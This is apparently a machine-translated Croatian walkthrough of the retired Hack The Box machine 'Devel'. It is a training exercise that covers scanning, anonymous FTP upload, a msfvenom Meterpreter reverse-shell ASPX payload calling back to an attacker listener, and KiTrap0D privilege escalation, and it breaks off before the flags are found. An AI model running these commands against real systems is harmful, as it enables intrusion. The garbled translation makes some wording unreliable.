Budi smiren i hakiraj kutiju

Hack The Box (HTB) mrežna je platforma koja vam omogućuje da testirate svoje vještine testiranja penetracije. Sadrži nekoliko izazova koji se neprestano ažuriraju. Neki od njih simuliraju scenarije iz stvarnog svijeta, a neki se više naginju CTF stilu izazova.

Napomena . Dopušteni su samo prepisi umirovljenih HTB strojeva.

Devel je opisan kao relativno jednostavan okvir koji prikazuje sigurnosne rizike povezane s nekim zadanim konfiguracijama programa. To je stroj na početnoj razini koji se može dovršiti pomoću javno dostupnih exploita.

Upotrijebit ćemo sljedeće alate za zalaganje okvira na kutiji Kali Linux

nmap
zenmap
searchsploit
metasploit
msfvenom

Korak 1 - Skeniranje mreže

Prvi korak prije iskorištavanja stroja je malo skeniranje i izviđanje.

Ovo je jedan od najvažnijih dijelova jer će odrediti što kasnije možete pokušati iskoristiti. Uvijek je bolje potrošiti više vremena na tu fazu kako biste dobili što više informacija.

Koristit ću Nmap (Network Mapper), koji je besplatan uslužni program otvorenog koda za otkrivanje mreže i reviziju sigurnosti. Koristi sirove IP pakete kako bi utvrdio koji su hostovi dostupni na mreži, koje usluge ti hostovi nude, koji operativni sustavi pokreću, koji se tip filtara / vatrozida koriste, te desetke drugih karakteristika.

Mnogo je naredbi koje možete koristiti s ovim alatom za skeniranje mreže. Ako želite saznati više o tome, ovdje možete pogledati dokumentaciju.

Koristim sljedeću naredbu da dobijem osnovnu ideju o tome što skeniramo

nmap -sV -O -F --version-light 10.10.10.5

-sV: Ispitajte otvorene portove kako biste utvrdili informacije o usluzi / verziji

-O: Omogući otkrivanje OS-a

-F: Brzi način rada - skenirajte manje priključaka od zadanog skeniranja

--version-light: Ograničeno na najvjerojatnije sonde (intenzitet 2)

10.10.10. 5 : IP adresa okvira Devel

Također možete koristiti Zenmap , koji je službeni GUI Nmap Security Scanner. To je multiplatformska, besplatna aplikacija s otvorenim kodom koja za cilj ima olakšati upotrebu Nmapa za početnike, a istovremeno pruža napredne značajke za iskusne Nmap korisnike.

Koristim drugačiji skup naredbi za intenzivno skeniranje

nmap -A -v 10.10.10.5

-A: Omogućite otkrivanje OS-a, otkrivanje verzija, skeniranje skripti i traceroute

-v: Povećajte razinu detaljnosti

10.10.10.5: IP adresa okvira Devel

Ako smatrate da su rezultati previše neodoljivi, možete prijeći na karticu Ports / Hosts da biste dobili samo otvorene portove.

Vidimo da postoje 2 otvorena porta:

Luka 21 . Kontrola protokola za prijenos datoteka (FTP) (naredba). Ovdje je riječ o Microsoftovom FTP-u

Luka 80 . Protokol za prijenos hiperteksta (HTTP). Ovdje je riječ o IIS poslužitelju

Čini se da je u ovom slučaju najvjerojatniji početni vektor napada FTP

Korak 2 - ranjivi FTP

Otvaramo Firefox i posjećujemo web stranicu na //10.10.10.5

Iz faze izviđanja pronašli smo 2 datoteke pod Microsoftovim FTP-om. Pogledajmo možemo li im pristupiti iz preglednika.

Mogu pristupiti slikovnoj datoteci welcome.png posjetom

//10.10.10.5/welcome.png

Ja također mogu pristupiti iisstart.htm stranicu

//10.10.10.5/iisstart.htm

Sada znamo dvije stvari:

FTP se koristi kao direktorij datoteka za web poslužitelj - otkriven kad smo pristupili datotekama iz faze ponovne obrade.

FTP omogućuje anonimnu prijavu - otkrivenu kada smo izvršili intenzivno skeniranje.

Pogledajmo možemo li stvoriti datoteku i dodati je na FTP

Stvaram datoteku pomoću ove naredbe i izlazim rezultat u datoteku koja se naziva htb.html

echo HackTheBox > htb.html

Zatim s ls provjerim je li datoteka stvorena i kakav je sadržaj datoteke pomoću ove naredbe

cat htb.html

Spojimo se sada na FTP da dodamo našu testnu datoteku

Za povezivanje s FTP-om koristim ovu naredbu

ftp 10.10.10.5

I tip Anonimni kao korisničko ime i samo pritisnite enter za lozinku, jer omogućuje anonimno prijavu.

Sada sam spojen na FTP.

Ovom naredbom dodajem datoteku na FTP

put htb.html

Datoteka je uspješno poslana. Provjerimo možemo li mu pristupiti iz Firefoxa. Posjećujem stranicu i na web stranici možemo vidjeti izlaz HackTheBox .

//10.10.10.5/htb.html

Sad kad znamo da možemo slati datoteke, napravimo exploit!

Korak 3 - Korištenje MSFvenoma za izradu exploita

Koristit ćemo MSFvenom, koji je generator korisnog tereta. Više o tome možete saznati ovdje

Ali prvo, provjerimo na Metasploit Framework-u koji će teret trebati za izradu našeg exploita.

Znamo da moramo stvoriti obrnutu ljusku , koja je vrsta ljuske u kojoj ciljni stroj natrag komunicira s napadačkim strojem. Napadački stroj ima port slušatelja na koji prima vezu, što se postiže korištenjem koda ili izvršenja naredbe.

Obrnuta TCP ljuska trebala bi biti za Windows i mi ćemo koristiti Meterpreter .

Na web mjestu Offensive Security dobivamo ovu definiciju za Meterpreter

Meterpreter je napredni, dinamički proširiva nosivost koja koristi in-memory DLL injection stagers i produžava preko mreže za vrijeme izvođenja. Komunicira preko utičnice za stager i pruža sveobuhvatan Ruby API na strani klijenta. Sadrži povijest naredbi, završetak kartice, kanale i još mnogo toga.

Više o Meterpreteru možete pročitati ovdje.

Pokrećem Metasploit i tražim obrnuti TCP teret. Koristim sljedeću naredbu

search windows/meterpreter/reverse_tcp

Pronalazimo zanimljiv teret, broj 2, koji je Reverse TCP Stager .Ovo korisno opterećenje ubrizgava DLL poslužitelja meterpretera putem korisnog tereta Reflective Dll Injection i povezuje se natrag s napadačem

payload/windows/meterpreter/reverse_tcp

Vratimo se sada msfvenomu kako bismo izradili svoj exploit. I preciznije reverzna ljuska aspx- a. Ovaj je podatak prikupljen tijekom faze rekonstrukcije

Koristim sljedeću naredbu

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : Korisni teret za korištenje

- f : Izlazni format

- 0 : spremite korisni teret u datoteku

LHOST : Lokalni domaćin

LPORT : Lokalna luka

Zatim provjerim kod ls je li datoteka stvorena. Vrijeme je da ga pošaljete na FTP

Ponovno se povežite s FTP-om i pošaljite svoj mali poklon!

Spajam se na FTP, unosim anonimno kao korisničko ime, preskačem lozinku pritiskom na enter. Zatim datoteku šaljem sljedećom naredbom

put devel.aspx

Provjerimo je li datoteka ispravno poslana. Vraćajući se u Firefox , dolazim do FTP poslužitelja sljedećom naredbom

ftp://10.10.10.5

Vidimo da je naš mali poklon ovdje!

Evo iskorištavanja, ako vas zanima kako to izgleda

Korak 4 - Postavljanje slušatelja pomoću Metasploita

Natrag na Metasploit gdje koristim sljedeću naredbu za postavljanje rukovaoca korisnim opterećenjem

use exploit/multi/handler

Provjeravam koje su opcije dostupne

Prvo smo postavili korisni teret

set payload windows/meterpreter/reverse_tcp

Tada NAJGUSTI

set lhost 10.10.14.15

I na kraju LPORT

set lport 4444

Ako sada provjerimo opcije, trebali bismo vidjeti da je sve postavljeno

Pokrenimo exploit.

Nakon što se pojavi ova poruka

Started reverse TCP handler on 10.10.14.15:4444

vratite se u preglednik i pristupite stranici na kojoj se nalazi zlonamjerna skripta

//10.10.10.5/devel.aspx

Tada biste trebali vidjeti stvorenu sesiju Meterpretera

Sad kad imam sesiju, pokušavam potražiti prvu zastavicu user.txt pomoću sljedeće naredbe na meterpreter

search -f user.txt

Nijedna datoteka se ne podudara s mojim pretraživanjem. Pokušavam s. * Vidjeti druge datoteke, ali ništa korisno

Zatim kreiram ljusku pomoću sljedeće naredbe

shell

Sljedeću naredbu koristim za dobivanje informacija o sustavu

systeminfo

Vidimo da se registrirani vlasnik zove babis . To bi mogao biti važan podatak kada ćemo tražiti korisničku zastavicu. Također možemo primijetiti da stroj nema hitne ispravke.

Počinjem se kretati kroz mape. Koristim dir za popis svih datoteka / mapa, a cd za promjenu direktorija. Iskušavam sreću u mapama babis i Administrator , ali obje su mi dale pristup.

Moramo eskalirati privilegij! Znajući da kada smo provjerili informacije o sustavu, nisu pronađeni hitni ispravci, možemo pokušati pronaći exploit-ove primjenjive na ovaj stroj.

Korak 5 - Izvođenje Privilege eskalacije

Ovom naredbom stavio sam sesiju u pozadinu

background

Tada koristim sljedeću naredbu

use post/multi/recon/local_exploit_suggester

Ovaj modul sugerira lokalne eksploatacije Meterpretera koji se mogu koristiti. Eksploati se preporučuju na temelju arhitekture i platforme da je korisniku otvorena ljuska, kao i dostupnih eksploatacija u Meterpreteru

Provjeravam opcije i postavljam sesiju

Važno je napomenuti da neće biti otpuštene sve lokalne eksploatacije. Eksploativi se biraju na temelju ovih uvjeta: vrste sesije, platforme, arhitekture i potrebnih zadanih opcija

Spuštajući se niz popis

exploit/windows/local/bypassuac_eventvwr

ne uspije zbog toga što IIS korisnik nije dio grupe administratora, što je zadana postavka i očekuje se.

Koristim sljedeći exploit na popisu, koji je

use exploit/windows/local/ms10_015_kitrap0d

Ovaj će modul stvoriti novu sesiju s privilegijama SUSTAVA putem eksploatacije KiTrap0D od strane Tavisa Ormandyja. Ako je sesija u upotrebi već povišena, tada se exploit neće pokrenuti. Modul se oslanja na kitrap0d.x86.dll i nije podržan u x64 izdanjima Windowsa.

Kada smo pokrenuli sysinfo u sesiji Meterpreter, otkrilo je da je cilj bila x86 arhitektura

Provjerim opcije i zatim postavim sesiju

Vodim eksploataciju.

Eksploatacija je bila uspješna, ali sesija se nije mogla stvoriti. To je zbog prvog retka u exploitu koji pokušava postaviti obrnuti rukovatelj na zadanom eth0 i zadanom portu, a ne VPN sučelju za HTB laboratorije.

Started reverse TCP handler on 10.0.2.15:4444

Provjeravam opcije i postavljam LHOST i LPORT

Zatim provjeravam sve sesije žive sljedećom naredbom, u slučaju da mi je sesija umrla

sessions -l

Mogu vidjeti svoju sesiju

Sad kad imamo sesiju meterpretera, krenimo kretati se mapom i pronaći zastavice!

Korak 6 - Traženje zastavice user.txt

Prvo provjerimo gdje smo sa sljedećom naredbom

pwd

što je skraćenica za tiskani radni direktorij

Idem do C: \ i je li sve datoteke / mape. Iz svog prethodnog pokušaja u koraku 4 - Postavljanje slušatelja s Metasploitom, već znam kamo tražiti